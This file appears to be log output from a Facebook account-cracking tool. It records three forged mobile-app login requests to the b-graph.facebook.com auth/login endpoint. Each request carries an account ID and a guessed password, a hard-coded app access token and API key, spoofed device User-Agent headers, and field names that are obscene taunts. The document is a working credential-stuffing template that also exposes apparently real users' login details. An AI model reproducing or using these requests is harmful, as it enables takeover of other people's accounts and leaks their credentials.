#-M1
{'kids_xudina': '0ba8f01e-e31a-42b9-b39d-3f84f3520dbb', 'format': 'json', 'sha_kids_bokachoda': 'cc1ac339-30db-4760-8b0e-80479960ee6b', 'FUCK_ARAFAT': 'true', 'family_device_id': 'f3209be9-689b-4d19-a7ca-3d351cd0cc7e', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '100024063161023', 'password': 'mdsobuj123', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'locale': 'fr_DZ', 'client_country_code': 'DZ', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
{'User-Agent': 'FB4A/FBAV/280.0.0.56173.56173;FBDV/XQ-BC72;FBOP/1;FBCR/;FBBD/Samsung;FBPN/com.facebook.katana;FBSV/7.1;FBOP/TP1A.220624.014;FBCL/en_AU;', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '45204', 'X-FB-SIM-HNI': '45201', 'X-FB-Connection-Type': 'unknown', 'Content-Length': '633'}
https://b-graph.facebook.com/auth/login
#-M2
{'kids_xudina': '8aaad787-d074-4174-88c0-0703a6321da8', 'format': 'json', 'sha_kids_bokachoda': '5b1677e3-65cc-41cc-93a0-4a4d4e209693', 'FUCK_ARAFAT': 'true', 'family_device_id': 'ca1470c1-8d58-4f56-9103-7144c14e51aa', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '100090558914463', 'password': 'wardi123', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'locale': 'fr_DZ', 'client_country_code': 'DZ', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
{'User-Agent': 'FB4A/FBAV/282.0.0.28977.28977;FBDV/Pixel 4a;FBOP/1;FBCR/;FBBD/Samsung;FBPN/com.facebook.katana;FBSV/11;FBOP/SP1A.210812.016;FBCL/en_CA;', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '45204', 'X-FB-SIM-HNI': '45201', 'X-FB-Connection-Type': 'unknown', 'Content-Length': '631'}
https://b-graph.facebook.com/auth/login
#-M3
{'kids_xudina': '30999556-cdc4-4c5c-b6c2-a721f895455d', 'format': 'json', 'sha_kids_bokachoda': 'ff09c994-589b-4da6-b697-1f92ccc4d04d', 'FUCK_ARAFAT': 'true', 'family_device_id': 'a3aa88ff-22b6-4d90-bf9e-e8b4711cd19b', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': '61578633663976', 'password': 'faija@@12@@bbz123', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'locale': 'fr_DZ', 'client_country_code': 'DZ', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
{'User-Agent': 'FB4A/FBAV/297.0.0.39749.39749;FBDV/Redmi Note 10;FBOP/1;FBCR/;FBBD/Samsung;FBPN/com.facebook.katana;FBSV/8.1;FBOP/RQ3A.210605.006;FBCL/en_GB;', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '45204', 'X-FB-SIM-HNI': '45201', 'X-FB-Connection-Type': 'unknown', 'Content-Length': '646'}
https://b-graph.facebook.com/auth/login